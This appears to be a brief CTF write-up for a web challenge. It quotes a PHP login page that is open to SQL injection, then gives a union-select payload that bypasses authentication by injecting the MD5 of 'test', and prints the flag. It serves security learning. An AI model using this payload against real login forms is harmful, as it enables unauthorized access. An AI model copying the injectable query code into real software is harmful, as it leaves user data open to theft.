topic
View source
http://ctf5.shiyanbar.com/web/5/index.txt
code show as below
<html> <head> welcome to simplexue </head> <body> <?php if($_POST[user] && $_POST[pass]) { $conn = mysql_connect("********, "*****", "********"); mysql_select_db("phpformysql") or die("Could not select database"); if ($conn->connect_error) { die("Connection failed: " . mysql_error($conn)); } $user = $_POST[user]; $pass = md5($_POST[pass]); $sql = "select pw from php where user='$user'"; $query = mysql_query($sql); if (!$query) { printf("Error: %s\n", mysql_error($conn)); exit(); } $row = mysql_fetch_array($query, MYSQL_ASSOC); //echo $row["pw"]; if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) { echo "<p>Logged in! Key:************** </p>"; } else { echo("<p>Log in failure!</p>"); } } ?> <form method=post action=index.php> <input type=text name=user value="Username"> <input type=password name=pass value="Password"> <input type=submit> </form> </body> <a href="index.txt"> </html>
User submitted with POST, query pw
If pw is consistent with the value of the function md5 encrypted pass submitted
We can construct payload
Username : 1' union select "098f6bcd4621d373cade4e832627b4f6" #
Password: test
098f6bcd4621d373cade4e832627b4f6 is md5 encrypted value of the test
SimCTF {youhaocongming}
strcasecmp () compares two strings (case insensitive)
the mysql_fetch_array ( Result, resultType ) Fetch a row from the result as a digital or associative array
resulttype has the following parameters
-
MYSQLI_ASSOC associative array
-
MYSQLI_NUM array of numbers
-
MYSQLI_BOTH return